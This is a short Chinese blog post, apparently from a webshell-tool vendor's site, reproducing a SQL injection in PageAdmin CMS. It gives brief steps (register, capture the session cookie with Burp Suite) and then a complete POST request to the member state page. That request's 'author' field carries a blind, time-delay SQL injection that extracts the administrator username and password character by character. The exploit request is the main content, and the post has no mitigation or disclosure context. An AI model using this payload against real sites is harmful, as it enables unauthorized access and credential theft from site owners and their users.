会飞的鱼

PageAdmin CMS SQL注入漏洞 复现

1.先注册,然后登录。


2.实用burp suite 抓COOKIE


3.最后提交 Payload

POST /e/member/state.aspx?table=pa_member&detailid=2&workid=1&s=1 Host: localhost:59361 Content-Type: application/x-www-form-urlencoded Cookie: administrator=admin; ASP.NET_SessionId=1yal5a452m0a0lbwr5dqmqj3; tongji=1; referer=; site=1; Member=UID=336&Valicate=11b538897eb106123c9971911431341875fdc152 post=update&current_title=111&current_username=aaaa2222&sendmail=1&author=' or (select top 1 asc(mid(UserName+UserPassword,1,1)) from 
pa_member)=97 and (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0  and ''='

提交条件假

提交条件真


×

感谢您的支持,我们会一直保持!

扫码支持
请土豪扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在


版权所有,转载注意明处:XISE菜刀官方 » PageAdmin CMS SQL注入漏洞 复现
版权所有:《XISE菜刀官方
文章标题:《PageAdmin CMS SQL注入漏洞 复现
除非注明,文章均为 《XISE菜刀官方》 原创
转载请注明本文短网址:http://www.xisewbms.cn/?post=49  [生成短网址]

发表评论

表情
看不清楚?点图切换

网友评论(0)